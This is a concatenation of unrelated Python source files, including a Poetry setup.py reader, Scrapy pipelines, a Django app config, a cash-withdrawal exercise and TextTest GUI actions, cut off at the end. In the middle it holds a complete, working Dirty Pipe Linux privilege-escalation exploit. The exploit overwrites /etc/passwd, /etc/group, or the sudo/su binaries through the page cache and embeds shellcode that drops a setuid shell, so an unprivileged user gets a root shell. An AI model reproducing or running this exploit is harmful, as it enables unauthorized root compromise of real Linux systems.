default=VOCAB_SIZE, help="maximum size of vocab (default: %(default)s)" ) parser.add_argument( "--coverage", type=float, default=COVERAGE, help="token coverage to set token count cutoff (default: %(default)s)" ) parser.add_argument( "--context-size", type=int, default=CONTEXT_SIZE, help="size of context window (default: %(default)s)" ) args = parser.parse_args() logger.info("call: %s.", " ".join(sys.argv), extra={"ArgumentParser": args.__dict__}) logger.info("ArgumentParser: %s.", args.__dict__) try: main(**args.__dict__) except KeyboardInterrupt: pass except Exception as e: logger.exception(e) raise e
from django.apps import AppConfig class learnConfig(AppConfig): name = "learn" verbose_name = "learn"
from __future__ import annotations import ast from configparser import ConfigParser from pathlib import Path from typing import Any from poetry.core.semver.version import Version class SetupReader: """ Class that reads a setup.py file without executing it. """ DEFAULT: dict[str, Any] = { "name": None, "version": None, "install_requires": [], "extras_require": {}, "python_requires": None, } FILES = ["setup.py", "setup.cfg"] @classmethod def read_from_directory(cls, directory: str | Path) -> dict[str, Any]: if isinstance(directory, str): directory = Path(directory) result = cls.DEFAULT.copy() for filename in cls.FILES: filepath = directory / filename if not filepath.exists(): continue read_file_func = getattr(cls(), "read_" + filename.replace(".", "_")) new_result = read_file_func(filepath) for key in result.keys(): if new_result[key]: result[key] = new_result[key] return result def read_setup_py(self, filepath: str | Path) -> dict[str, Any]: if isinstance(filepath, str): filepath = Path(filepath) with filepath.open(encoding="utf-8") as f: content = f.read() result: dict[str, Any] = {} body = ast.parse(content).body setup_call = self._find_setup_call(body) if setup_call is None: return self.DEFAULT # Inspecting keyword arguments call, body = setup_call result["name"] = self._find_single_string(call, body, "name") result["version"] = self._find_single_string(call, body, "version") result["install_requires"] = self._find_install_requires(call, body) result["extras_require"] = self._find_extras_require(call, body) result["python_requires"] = self._find_single_string( call, body, "python_requires" ) return result def read_setup_cfg(self, filepath: str | Path) -> dict[str, Any]: parser = ConfigParser() parser.read(str(filepath)) name = None version = None if parser.has_option("metadata", "name"): name = parser.get("metadata", "name") if parser.has_option("metadata", "version"): version = Version.parse(parser.get("metadata", "version")).text install_requires = [] extras_require: dict[str, list[str]] = {} python_requires = None if parser.has_section("options"): if parser.has_option("options", "install_requires"): for dep in parser.get("options", "install_requires").split("\n"): dep = dep.strip() if not dep: continue install_requires.append(dep) if parser.has_option("options", "python_requires"): python_requires = parser.get("options", "python_requires") if parser.has_section("options.extras_require"): for group in parser.options("options.extras_require"): extras_require[group] = [] deps = parser.get("options.extras_require", group) for dep in deps.split("\n"): dep = dep.strip() if not dep: continue extras_require[group].append(dep) return { "name": name, "version": version, "install_requires": install_requires, "extras_require": extras_require, "python_requires": python_requires, } def _find_setup_call( self, elements: list[ast.stmt] ) -> tuple[ast.Call, list[ast.stmt]] | None: funcdefs: list[ast.stmt] = [] for i, element in enumerate(elements): if isinstance(element, ast.If) and i == len(elements) - 1: # Checking if the last element is an if statement # and if it is 'if __name__ == "__main__"' which # could contain the call to setup() test = element.test if not isinstance(test, ast.Compare): continue left = test.left if not isinstance(left, ast.Name): continue if left.id != "__name__": continue setup_call = self._find_sub_setup_call([element]) if setup_call is None: continue call, body = setup_call return call, body + elements if not isinstance(element, ast.Expr): if isinstance(element, ast.FunctionDef): funcdefs.append(element) continue value = element.value if not isinstance(value, ast.Call): continue func = value.func if not (isinstance(func, ast.Name) and func.id == "setup") and not ( isinstance(func, ast.Attribute) and getattr(func.value, "id", None) == "setuptools" and func.attr == "setup" ): continue return value, elements # Nothing, we inspect the function definitions return self._find_sub_setup_call(funcdefs) def _find_sub_setup_call( self, elements: list[ast.stmt] ) -> tuple[ast.Call, list[ast.stmt]] | None: for element in elements: if not isinstance(element, (ast.FunctionDef, ast.If)): continue setup_call = self._find_setup_call(element.body) if setup_call is not None: sub_call, body = setup_call body = elements + body return sub_call, body return None def _find_install_requires(self, call: ast.Call, body: list[ast.stmt]) -> list[str]: install_requires: list[str] = [] value = self._find_in_call(call, "install_requires") if value is None: # Trying to find in kwargs kwargs = self._find_call_kwargs(call) if kwargs is None or not isinstance(kwargs, ast.Name): return install_requires variable = self._find_variable_in_body(body, kwargs.id) if not isinstance(variable, (ast.Dict, ast.Call)): return install_requires if isinstance(variable, ast.Call): if not isinstance(variable.func, ast.Name): return install_requires if variable.func.id != "dict": return install_requires value = self._find_in_call(variable, "install_requires") else: value = self._find_in_dict(variable, "install_requires") if value is None: return install_requires if isinstance(value, ast.List): for el in value.elts: if isinstance(el, ast.Str): install_requires.append(el.s) elif isinstance(value, ast.Name): variable = self._find_variable_in_body(body, value.id) if variable is not None and isinstance(variable, ast.List): for el in variable.elts: if isinstance(el, ast.Str): install_requires.append(el.s) return install_requires def _find_extras_require( self, call: ast.Call, body: list[ast.stmt] ) -> dict[str, list[str]]: extras_require: dict[str, list[str]] = {} value = self._find_in_call(call, "extras_require") if value is None: # Trying to find in kwargs kwargs = self._find_call_kwargs(call) if kwargs is None or not isinstance(kwargs, ast.Name): return extras_require variable = self._find_variable_in_body(body, kwargs.id) if not isinstance(variable, (ast.Dict, ast.Call)): return extras_require if isinstance(variable, ast.Call): if not isinstance(variable.func, ast.Name): return extras_require if variable.func.id != "dict": return extras_require value = self._find_in_call(variable, "extras_require") else: value = self._find_in_dict(variable, "extras_require") if value is None: return extras_require if isinstance(value, ast.Dict): val: ast.expr | None for key, val in zip(value.keys, value.values): if not isinstance(key, ast.Str): continue if isinstance(val, ast.Name): val = self._find_variable_in_body(body, val.id) if isinstance(val, ast.List): extras_require[key.s] = [ e.s for e in val.elts if isinstance(e, ast.Str) ] elif isinstance(value, ast.Name): variable = self._find_variable_in_body(body, value.id) if variable is None or not isinstance(variable, ast.Dict): return extras_require for key, val in zip(variable.keys, variable.values): if not isinstance(key, ast.Str): continue if isinstance(val, ast.Name): val = self._find_variable_in_body(body, val.id) if isinstance(val, ast.List): extras_require[key.s] = [ e.s for e in val.elts if isinstance(e, ast.Str) ] return extras_require def _find_single_string( self, call: ast.Call, body: list[ast.stmt], name: str ) -> str | None: value = self._find_in_call(call, name) if value is None: # Trying to find in kwargs kwargs = self._find_call_kwargs(call) if kwargs is None or not isinstance(kwargs, ast.Name): return None variable = self._find_variable_in_body(body, kwargs.id) if not isinstance(variable, (ast.Dict, ast.Call)): return None if isinstance(variable, ast.Call): if not isinstance(variable.func, ast.Name): return None if variable.func.id != "dict": return None value = self._find_in_call(variable, name) else: value = self._find_in_dict(variable, name) if value is None: return None if isinstance(value, ast.Str): return value.s elif isinstance(value, ast.Name): variable = self._find_variable_in_body(body, value.id) if variable is not None and isinstance(variable, ast.Str): return variable.s return None def _find_in_call(self, call: ast.Call, name: str) -> Any | None: for keyword in call.keywords: if keyword.arg == name: return keyword.value return None def _find_call_kwargs(self, call: ast.Call) -> Any | None: kwargs = None for keyword in call.keywords: if keyword.arg is None: kwargs = keyword.value return kwargs def _find_variable_in_body( self, body: list[ast.stmt], name: str ) -> ast.expr | None: for elem in body: if not isinstance(elem, ast.Assign): continue for target in elem.targets: if not isinstance(target, ast.Name): continue if target.id == name: return elem.value return None def _find_in_dict(self, dict_: ast.Dict, name: str) -> ast.expr | None: for key, val in zip(dict_.keys, dict_.values): if isinstance(key, ast.Str) and key.s == name: return val return None
# -*- coding: utf-8 -*- import re import scrapy import logging from typing import List from ..utils import get_soup class ItemDebugPipeline(object): """Print item for debug""" def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> List: for k, v in item.items(): spider.log('{}: {}'.format(k, v), logging.INFO) return item class ImagePipeline(object): """Extract images from content, replace img tags with placeholder and populagte 'image_urls' for download""" def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> List: if 'content' in item: s = get_soup(item['content']) images = s.select('img') if len(images): item['image_urls'] = [x['src'] for x in images] item['content'] = re.sub(r'<img src=[^>]+\>', '{{@IMG}}', item['content']) else: item['image_urls'] = [] return item
import logging ''' G E T D A T A F R O M W O R D S U M ''' ''' Get and check the file state is it has all the data for the word2vec. ''' def get_file_state(text_model): logging.debug("Getting file state :") if 'fileState' in text_model: file_state = text_model['fileState'] else: file_state = None return file_state ''' Get narrator from all of the text model. This returns a list of list paragraphs of list sentences. ''' def get_text_model_narrator_paragraphs(text_model): logging.debug("Getting all the narrator sentences of a text model") paragraphs = [] for paragraph_model in text_model['paragraphStates']: paragraphs.append(get_paragraph_model_narrator_sentences(paragraph_model)) return paragraphs ''' Get the the narrator sentence from a paragraph. ''' def get_paragraph_model_narrator_sentences(paragraph_model): logging.debug("Getting all the narrator sentences of the paragraph model.") paragraph = [] for sentence_model in paragraph_model['sentenceStates']: if sentence_model['dialogState']['dialog'] == False: paragraph.append(sentence_model['sentence']) return paragraph ''' Get narrator from all of the text model. This returns a list of list paragraphs of list sentences. ''' def get_text_model_dialog_paragraphs(text_model): logging.debug("Getting all the narrator sentences of a text model") paragraphs = [] for paragraph_model in text_model['paragraphStates']: if paragraph_model['dialog'] == True: paragraphs.append(get_paragraph_model_dialog_sentences(paragraph_model)) return paragraphs ''' Get the the narrator sentence from a paragraph. ''' def get_paragraph_model_dialog_sentences(paragraph_model): logging.debug("Getting all the dialog sentences of the paragraph model.") paragraph = [] for sentence_model in paragraph_model['sentenceStates']: if sentence_model['dialogState']['dialog'] == True: paragraph.append(sentence_model['sentence']) return paragraph ''' This will take a paragraph model and get the sentence objects that have dialog objects. ''' def get_dialog_object_connected_narrative_paragraph_model(paragraph_model): logging.debug("Getting get_paragraph_model_narrator_with_dialog_sentence") dialog_sentence_obj = [] for sentence_model in paragraph_model['sentenceStates']: if sentence_model['dialogState']['dialog'] == True and 'originOfDialogFromOrderParagraph' in sentence_model['dialogState']: dialog_sentence_obj.append(sentence_model) return dialog_sentence_obj ''' This function gets the narrative sentence connected by syntax to the dialog object. ''' def get_narrative_with_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph): logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence") sentence_sentence_obj = [] for sentence_model in paragraph_model['sentenceStates']: if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph: sentence_sentence_obj.append(sentence_model) return sentence_sentence_obj ''' This functions gets all the dialog of dialog object. ''' def get_dialog_connected_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph): logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence") sentence_sentence_obj = [] for sentence_model in paragraph_model['sentenceStates']: if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph: sentence_sentence_obj.append(sentence_model) return sentence_sentence_obj
################################################################################ # Author: Marc Bohler - https://github.com/crusoe112 # # # # Description: Uses Dirty Pipe vulnerability to pop a root shell using Python # # # # Credits: This code basically combines 2 existing poc's for dirty pipe: # # https://github.com/febinrev/dirtypipez-exploit # # https://github.com/eremus-dev/Dirty-Pipe-sudo-poc # # Those projects, in turn, borrowed directly from the OG: # # Max Kellermann max.kellermann@ionos.com # # https://dirtypipe.cm4all.com/ # # # # Usage: python dirty.py # # # # Requirements: Requires python > 3.10 because of os.splice # # # # Notes: This exploit will overwrite a page of the file that resides in # # the page cache. It is unlikely to corrupt the actual file. If # # there is corruption or an error, you likely just need to wait # # until the page is overwritten, or restart your computer to fix # # any problems. # # That being said, I bear no responsibility for damage done by # # this code, so please read carefully and hack responsibly. # # Be sure to check out Max Kellerman's writeup at cm4all.com as # # well. # ################################################################################ import argparse import sys import pty import os import getpass import subprocess import platform from os.path import exists # Kernel page size PAGE = 4096 # Linux pipe buffers are 64K PIPESIZE = 65536 ########################################################### # Small (linux x86_64) ELF file matroshka doll that does: # # fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); # # write(fd, elfcode, elfcode_len) # # chmod("/tmp/sh", 04755) # # close(fd); # # exit(0); # # # # The dropped ELF simply does: # # setuid(0); # # setgid(0); # # execve("/bin/sh", ["/bin/sh", NULL], [NULL]); # # # # Credit: https://github.com/febinrev/dirtypipez-exploit # ########################################################### elfcode = [ 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 ] def backup_file(path, backup_path): """Back up just for working on the POC""" with open(path, 'rb') as orig_file: with open(backup_path, 'wb') as backup: data = orig_file.read() backup.write(data) def prepare_pipe(read: int, write: int) -> None: """ Contaminate the pipe flags by filling and draining """ data = b'a' * PIPESIZE written = os.write(write, data) print(f'[*] {written} bytes written to pipe') data = os.read(read, PIPESIZE) print(f'[*] {len(data)} bytes read from pipe') def run_poc(data: bytes, path: str, file_offset: int) -> None: """ Open target file, contaminate the pipe buff, call splice, write into target file """ print(f'[*] Opening {path}') target_file = os.open(path, os.O_RDONLY) print('[*] Opening PIPE') r, w = os.pipe() print('[*] Contaminating PIPE_BUF_CAN_MERGE flags') prepare_pipe(r, w) print(f'[*] Splicing byte from {path} to pipe') n = os.splice( target_file, w, 1, offset_src=file_offset ) print(f'[*] Spliced {n} bytes') print(f'[*] Altering {path}') n = os.write(w, data) print(f'[*] {n} bytes written to {path}') def find_offset_of_user_in_passwd(user): file_offset = 0 to_write = '' with open('/etc/passwd', 'r') as passwd: for line in passwd.readlines(): if not user in line: file_offset += len(line) else: fields = line.split(':') file_offset += len(':'.join(fields[:1])) original = ':'.join(fields[1:]) # Save original for recovering to_write = ':0:' + ':'.join(fields[3:]) # Set no passwd and uid 0 # Pad end of line with new line chars so we don't error length_diff = len(original) - len(to_write) if length_diff > 0: to_write = to_write[:-1] + ('\n' * length_diff) + '\n' return file_offset, to_write, original return False def find_offset_of_sudo_in_group(user): file_offset = 0 to_write = '' with open('/etc/group', 'r') as group: orig_file = group.read() group.seek(0) for line in group.readlines(): fields = line.split(':') if not fields[0].strip() == 'sudo': file_offset += len(line) else: file_offset += len(line) - 1 to_write = f',{user}\n' try: # Save original for recovering original = orig_file[file_offset:file_offset+len(to_write)] except IndexError: return False # Cannot be last line of file return file_offset - 1, to_write, original return False def within_page_bounds(file_offset, data_len): # Ensure that we are not at a page boundary if file_offset % PAGE == 0: print(f'[x] Cannot exploit start of page boundary with offset {file_offset}') print('[x] Do you have access to another user?') print('[x] Remember to clean up /tmp/backup_file') return False if (file_offset | PAGE) < (file_offset + data_len): print(f'[x] Cannot perform exploit across page boundary with offset {file_offset}') print('[x] Do you have access to another user?') print(f'[x] Remember to clean up {backup_path}') return False return True def check_etc_passwd(): # Check if /etc/passwd exists if not exists('/etc/passwd'): return False # Check if current user has login user = getpass.getuser() offset_data = find_offset_of_user_in_passwd(user) if not offset_data: return False # Check if on boundary if not within_page_bounds(offset_data[0], len(offset_data[1])): return False return True def check_etc_group(): if not exists('/etc/group'): return False user = getpass.getuser() offset_data = find_offset_of_sudo_in_group(user) if not offset_data: return False if not within_page_bounds(offset_data[0], len(offset_data[1])): return False return True def which(cmd): return subprocess.getoutput(f'which {cmd}').strip() def check_elf(cmd): sudo_path = which(cmd) if not exists(sudo_path): return False # Check if x86_64 if not platform.architecture(sudo_path) == ('64bit', 'ELF'): return False if not within_page_bounds(1, len(elfcode)): return False return True def run_elf(binary_name): # Backup file binary_path = which(binary_name) backup_path = f'/tmp/{binary_name}' print(f'[*] Backing up {binary_path} to {backup_path}') backup_file(binary_path, backup_path) # Set offset file_offset = 1 # Save original print(f'[*] Saving original state of {binary_path}') with open(binary_path, 'rb') as binary: orig_data = binary.read(len(elfcode) + 2)[2:] # Exploit print(f'[*] Hijacking {binary_path}') run_poc(bytes(elfcode), binary_path, file_offset) # Run modified binary print(f'[*] Executing modified {binary_path}') os.system(binary_path) # Restore state print(f'[*] Restoring {binary_path}') run_poc(orig_data, binary_path, file_offset) # Pop a shell print(f'[*] Popping root shell...') print() pty.spawn('/tmp/sh') print() # Cleanup print(f'[!] Remember to cleanup {backup_path} and /tmp/sh') print(f'[!] rm {backup_path}') print('[!] rm /tmp/sh') def run_etc_passwd(): # Backup file backup_path = '/tmp/passwd' target_file = '/etc/passwd' print(f'[*] Backing up {target_file} to {backup_path}') backup_file(target_file, backup_path) # Get offset user = getpass.getuser() print(f'[*] Calculating offset of {user} in {target_file}') (file_offset, data_to_write, original) = find_offset_of_user_in_passwd(user) # Exploit print(f'[*] Hijacking {target_file}') run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset) # Pop a shell print(f'[*] Popping root shell...') print() pty.spawn(['su', user]) print() print(f'[*] Restoring {target_file}') run_poc(bytes(original, 'utf-8'), target_file, file_offset) print(f'[!] Remember to cleanup {backup_path}') print(f'[!] rm {backup_path}') def run_etc_group(): # Backup file backup_path = '/tmp/group' target_file = '/etc/group' print(f'[*] Backing up {target_file} to {backup_path}') backup_file(target_file, backup_path) # Get offset user = getpass.getuser() print(f'[*] Calculating offset of {user} in {target_file}') (file_offset, data_to_write, original) = find_offset_of_sudo_in_group(user) # Exploit print(f'[*] Hijacking {target_file}') run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset) # Pop a shell print(f'[*] Popping root shell...') print() print(f'[!] Login with password of {user} (you will have to login twice)') print() # Login as user to refresh groups, then call sudo su in a pseudo terminal with -P flag pty.spawn(['su', user, '-P', '-c', 'sudo su']) print() print(f'[*] Restoring {target_file}') run_poc(bytes(original, 'utf-8'), target_file, file_offset) print(f'[!] Remember to cleanup {backup_path}') print(f'[!] rm {backup_path}') def main(): parser = argparse.ArgumentParser(description='Use dirty pipe vulnerability to pop root shell') parser.add_argument('--target', choices=['passwd','group','sudo','su'], help='The target read-only file to overwrite') args = parser.parse_args() if not args.target or args.target == 'passwd': print(f'[*] Attempting to modify /etc/passwd') if check_etc_passwd(): run_etc_passwd() sys.exit() print(f'[X] Cannot modify /etc/passwd') if not args.target or args.target == 'sudo': print(f'[*] Attempting to modify sudo binary') if check_elf('sudo'): run_elf('sudo') sys.exit() print(f'[X] Cannot modify sudo binary') if not args.target or args.target == 'su': print(f'[*] Attempting to modify su binary') if check_elf('su'): run_elf('su') sys.exit() print(f'[X] Cannot modify su binary') if not args.target or args.target == 'group': print(f'[*] Attempting to modify /etc/group') if check_etc_group(): run_etc_group() sys.exit() print(f'[X] Cannot modify /etc/group') print(f'[X] Exploit could not be executed!') if __name__ == '__main__': main()
n50 = n20 = n10 = n1 = 0 n = int(input('qual sera o valor sacado')) valortotal = n while True: if n >= 50: n = n-50 n50 += 1 elif n >= 20: n = n-20 n20 += 1 elif n >= 10: n = n-10 n10 += 1 elif n >= 1: n = n-1 n1 += 1 else: break print(f'seram entregues:') if n50 != 0: print(f'{n50} notas de R$50,00') if n20 != 0: print(f'{n20} notas de R$20,00') if n10 != 0: print(f'{n10} notas de R$10,00') if n1 != 0: print(f'{n1} notas de R$$1,00 ') print(f'Para pagar um total de R${valortotal}')
""" All the actions for administering the files and directories in a test suite """ import gtk, plugins, os, shutil, subprocess, testmodel,re from .. import guiplugins, guiutils from ordereddict import OrderedDict from zipfile import ZipFile from fnmatch import fnmatch # Cut, copy and paste class FocusDependentAction(guiplugins.ActionGUI): def notifyTopWindow(self, window): guiplugins.ActionGUI.notifyTopWindow(self, window) window.connect("set-focus", self.focusChanged) def focusChanged(self, dummy, widget): freeTextWidget = isinstance(widget, gtk.Entry) or isinstance(widget, gtk.TextView) if freeTextWidget: self.setSensitivity(False) elif self.isActiveOnCurrent(): self.setSensitivity(True) class ClipboardAction(FocusDependentAction): def isActiveOnCurrent(self, *args): if guiplugins.ActionGUI.isActiveOnCurrent(self, *args): for test in self.currTestSelection: if test.parent: return True return False def getSignalsSent(self): return [ "Clipboard" ] def _getStockId(self): return self.getName() def _getTitle(self): return "_" + self.getName().capitalize() def getTooltip(self): return self.getName().capitalize() + " selected tests" def noAncestorsSelected(self, test): if not test.parent: return True if test.parent in self.currTestSelection: return False else: return self.noAncestorsSelected(test.parent) def performOnCurrent(self): # If suites are selected, don't also select their contents testsForClipboard = filter(self.noAncestorsSelected, self.currTestSelection) self.notify("Clipboard", testsForClipboard, cut=self.shouldCut()) class CopyTests(ClipboardAction): def getName(self): return "copy" def shouldCut(self): return False class CutTests(ClipboardAction): def getName(self): return "cut" def shouldCut(self): return True class PasteTests(FocusDependentAction): def __init__(self, *args): FocusDependentAction.__init__(self, *args) self.clipboardTests = [] self.removeAfter = False def singleTestOnly(self): return True def _getStockId(self): return "paste" def _getTitle(self): return "_Paste" def getTooltip(self): return "Paste tests from clipboard" def notifyClipboard(self, tests, cut=False): self.clipboardTests = tests self.removeAfter = cut self.setSensitivity(True) def isActiveOnCurrent(self, test=None, state=None): return guiplugins.ActionGUI.isActiveOnCurrent(self, test, state) and len(self.clipboardTests) > 0 def getCurrentTestMatchingApp(self, test): # Try the exact application first, if that fails, look for extra-version for currTest in self.currTestSelection: if currTest.app == test.app: return currTest for currTest in self.currTestSelection: if currTest.app.name == test.app.name: return currTest def getDestinationInfo(self, test): currTest = self.getCurrentTestMatchingApp(test) if currTest is None: return None, 0 if currTest.classId() == "test-suite" and currTest not in self.clipboardTests: return currTest, 0 else: return currTest.parent, currTest.positionInParent() + 1 def getNewTestName(self, suite, oldName): existingTest = suite.findSubtest(oldName) if not existingTest: dirName = suite.getNewDirectoryName(oldName) if not os.path.exists(dirName): return oldName elif self.willBeRemoved(existingTest): return oldName nextNameCandidate = self.findNextNameCandidate(oldName) return self.getNewTestName(suite, nextNameCandidate) def willBeRemoved(self, test): return self.removeAfter and test in self.clipboardTests def findNextNameCandidate(self, name): copyPos = name.find("_copy_") if copyPos != -1: copyEndPos = copyPos + 6 number = int(name[copyEndPos:]) return name[:copyEndPos] + str(number + 1) elif name.endswith("copy"): return name + "_2" else: return name + "_copy" def getNewDescription(self, test): if len(test.description) or self.removeAfter: return test.description else: return "Copy of " + test.name def getRepositionPlacement(self, test, placement): currPos = test.positionInParent() if placement > currPos: return placement - 1 else: return placement def messageAfterPerform(self): pass # do it below... def performOnCurrent(self): newTests = [] destInfo = OrderedDict() for test in self.clipboardTests: suite, placement = self.getDestinationInfo(test) if suite: newName = self.getNewTestName(suite, test.name) destInfo[test] = suite, placement, newName if len(destInfo) == 0: raise plugins.TextTestError, "Cannot paste test there, as the copied test and currently selected test have no application/version in common" suiteDeltas = {} # When we insert as we go along, need to update subsequent placements for test, (suite, placement, newName) in destInfo.items(): suiteDeltas.setdefault(suite, 0) realPlacement = placement + suiteDeltas.get(suite) if self.removeAfter and newName == test.name and suite is test.parent: # Cut + paste to the same suite is basically a reposition, do it as one action repositionPlacement = self.getRepositionPlacement(test, realPlacement) plugins.tryFileChange(test.parent.repositionTest, "Failed to reposition test: no permissions to edit the testsuite file", test, repositionPlacement) newTests.append(test) else: newDesc = self.getNewDescription(test) # Create test files first, so that if it fails due to e.g. full disk, we won't register the test either... testDir = suite.getNewDirectoryName(newName) try: self.moveOrCopy(test, testDir) suite.registerTest(newName, newDesc, realPlacement) testImported = suite.addTest(test.__class__, os.path.basename(testDir), newDesc, realPlacement) # "testImported" might in fact be a suite: in which case we should read all the new subtests which # might have also been copied testImported.readContents(initial=False) testImported.updateAllRelPaths(test.getRelPath()) suiteDeltas[suite] += 1 newTests.append(testImported) if self.removeAfter: message = "Failed to remove old test: didn't have sufficient write permission to the test files. Test copied instead of moved." plugins.tryFileChange(test.remove, message) except EnvironmentError, e: if os.path.isdir(testDir): shutil.rmtree(testDir) self.showErrorDialog("Failed to paste test:\n" + str(e)) self.notify("SetTestSelection", newTests) self.currTestSelection = newTests self.notify("Status", self.getStatusMessage(suiteDeltas)) if self.removeAfter: # After a paste from cut, subsequent pastes should behave like copies of the new tests self.notify("Clipboard", newTests, cut=False) self.clipboardTests = newTests self.removeAfter = False for suite, placement, newName in destInfo.values(): suite.contentChanged() def getStatusMessage(self, suiteDeltas): suiteName = suiteDeltas.keys()[0].name if self.removeAfter: return "Moved " + self.describeTests() + " to suite '" + suiteName + "'" else: return "Pasted " + self.describeTests() + " to suite '" + suiteName + "'" def getSignalsSent(self): return [ "SetTestSelection", "Clipboard" ] def moveOrCopy(self, test, newDirName): # If it exists it's because a previous copy has already taken across the directory if not os.path.isdir(newDirName): oldDirName = test.getDirectory() if self.removeAfter: self.movePath(oldDirName, newDirName) else: self.copyPath(oldDirName, newDirName) # Methods overridden by version control @staticmethod def movePath(oldDirName, newDirName): os.rename(oldDirName, newDirName) @staticmethod def copyPath(oldDirName, newDirName): shutil.copytree(oldDirName, newDirName, ignore=shutil.ignore_patterns(*plugins.controlDirNames)) # And a generic import test. Note acts on test suites class ImportTest(guiplugins.ActionDialogGUI): def __init__(self, *args): guiplugins.ActionDialogGUI.__init__(self, *args) self.optionGroup.addOption("name", self.getNameTitle()) self.optionGroup.addOption("desc", self.getDescTitle(), description="Enter a description of the new " + self.testType().lower() + " which will be inserted as a comment in the testsuite file.", multilineEntry=True) self.optionGroup.addOption("testpos", self.getPlaceTitle(), "last in suite", allocateNofValues=2, description="Where in the test suite should the test be placed?") self.testsImported = [] def getConfirmationMessage(self): testName = self.getNewTestName() suite = self.getDestinationSuite() self.checkName(suite, testName) newDir = os.path.join(suite.getDirectory(), testName) if os.path.isdir(newDir): if self.testFilesExist(newDir, suite.app): raise plugins.TextTestError, "Test already exists for application " + suite.app.fullName() + \ " : " + os.path.basename(newDir) else: return "Test directory already exists for '" + testName + "'\nAre you sure you want to use this name?" else: return "" def _getStockId(self): return "add" def getSizeAsWindowFraction(self): # size of the dialog return 0.5, 0.45 def testFilesExist(self, dir, app): for fileName in os.listdir(dir): parts = fileName.split(".") if len(parts) > 1 and parts[1] == app.name: return True return False def singleTestOnly(self): return True def correctTestClass(self): return "test-suite" def getNameTitle(self): return self.testType() + " Name" def getDescTitle(self): return self.testType() + " Description" def getPlaceTitle(self): return "\nPlace " + self.testType() def getDefaultName(self): return "" def getDefaultDesc(self): return "" def updateOptions(self): self.optionGroup.setOptionValue("name", self.getDefaultName()) self.optionGroup.setOptionValue("desc", self.getDefaultDesc()) self.setPlacements(self.currTestSelection[0]) return True def 